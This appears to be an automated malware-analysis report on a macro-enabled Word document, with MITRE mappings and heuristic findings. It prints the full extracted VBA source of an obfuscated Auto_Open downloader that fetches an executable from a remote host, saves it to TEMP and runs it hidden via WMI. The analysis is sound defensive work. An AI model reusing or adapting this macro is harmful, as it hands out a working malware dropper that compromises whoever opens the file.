MALICIOUS
278
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is a malicious OOXML document containing a VBA macro with an Auto_Open function. This macro is designed to download a second-stage payload from the URL "http://192.168.1.43/macro.txt", save it as "AppLaunch-actual.exe" in the temporary directory, and then execute it using Win32_Process. The use of CreateObject and GetObject calls, along with obfuscated code, indicates a downloader functionality.
Heuristics 9
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
dollop.Write downloadf.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set downloadf = CreateObject("WinHttp.WinHttpRequest.5.1") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set downloadf = CreateObject("WinHttp.WinHttpRequest.5.1") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject(strGetObject) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
dstPath = Environ$("TEMP") & "\" & namePrefix & nameSuffix -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://192.168.1.43/macro.txt Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1879 bytes |
SHA-256: 0ebcd5e7676d2719374a41a75140aef0341d2c3e1b2ecb735580ef24d2dd78d1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
Execute
End Sub
Public Function Execute() As Variant
Dim payload As String
Dim namePrefix As String
Dim nameSuffix As String
Dim zzz As String
Dim dollop As Object
Dim dstPath As String
Dim savePath As String
namePrefix = "AppLaunch-actual"
nameSuffix = ".exe"
payload = "http://192.168.1.43/macro.txt"
zzz = payload
Dim downloadf
Set downloadf = CreateObject("WinHttp.WinHttpRequest.5.1")
downloadf.Open "GET", zzz, False
downloadf.setRequestHeader "Host", "192.168.1.43"
downloadf.Send
Set dollop = CreateObject(StrReverse("maertS.bdodA"))
dollop.Type = 1
dollop.Open
dollop.Write downloadf.responseBody
dstPath = Environ$("TEMP") & "\" & namePrefix & nameSuffix
savePath = dstPath
dollop.savetofile savePath, 2
Const HIDDEN_WINDOW = 0
strComputer = "."
binary = dstPath
strGetObject = StrReverse("2vmic\toor\.\\:stmgmniw")
Set objWMIService = GetObject(strGetObject)
Set objStartup = objWMIService.Get(StrReverse("putratSssecorP_23niW"))
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(strGetObject & StrReverse("ssecorP_23niW:"))
objProcess.Create binary, Null, objConfig, intProcessID
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 18944 bytes |
SHA-256: 96605ef2689f602c2711cda14fe3245d269c45f70ecca6f2afa521d2d2d0326f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.